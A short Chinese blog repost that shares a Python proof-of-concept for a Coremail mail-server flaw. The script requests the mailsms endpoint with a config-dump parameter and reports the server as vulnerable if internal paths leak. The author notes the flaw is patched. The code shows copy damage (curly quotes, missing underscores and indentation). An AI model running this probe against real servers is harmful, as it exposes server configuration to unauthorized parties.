关于coremail的0day
发布于2019-08-07 12:29 阅读(1078) 评论(0) 点赞(1) 收藏(0)
#-- Coding: utf-8 --
#Author: Vulkey_Chen
#Email: gh0stkey@hi-ourlife.com
#Website: www.hi-ourlife.com
#About: mailsms config dump PoC
import requests,sys
def mailsmsPoC(url):
url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/”
r = requests.get(url)
if (r.status_code != ‘404’) and ("/home/coremail" in r.text):
print “mailsms is vulnerable: {0}”.format(url)
else:
print “mailsms is safe!”
if name == ‘main’:
try:
mailsmsPoC(sys.argv[1])
except:
print “usage: python poc.py http://hi-ourlife.com/”
最新版本已修复 我只是记一下脚本
所属网站分类: 技术文章 > 博客
作者:美达
链接:https://www.pythonheidong.com/blog/article/10802/06512b64eb8105fc2b9a/
来源:python黑洞网
任何形式的转载都请注明出处,如有侵权 一经发现 必将追究其法律责任
昵称:
评论内容:(最多支持255个字符)
---无人问津也好,技不如人也罢,你都要试着安静下来,去做自己该做的事,而不是让内心的烦躁、焦虑,坏掉你本来就不多的热情和定力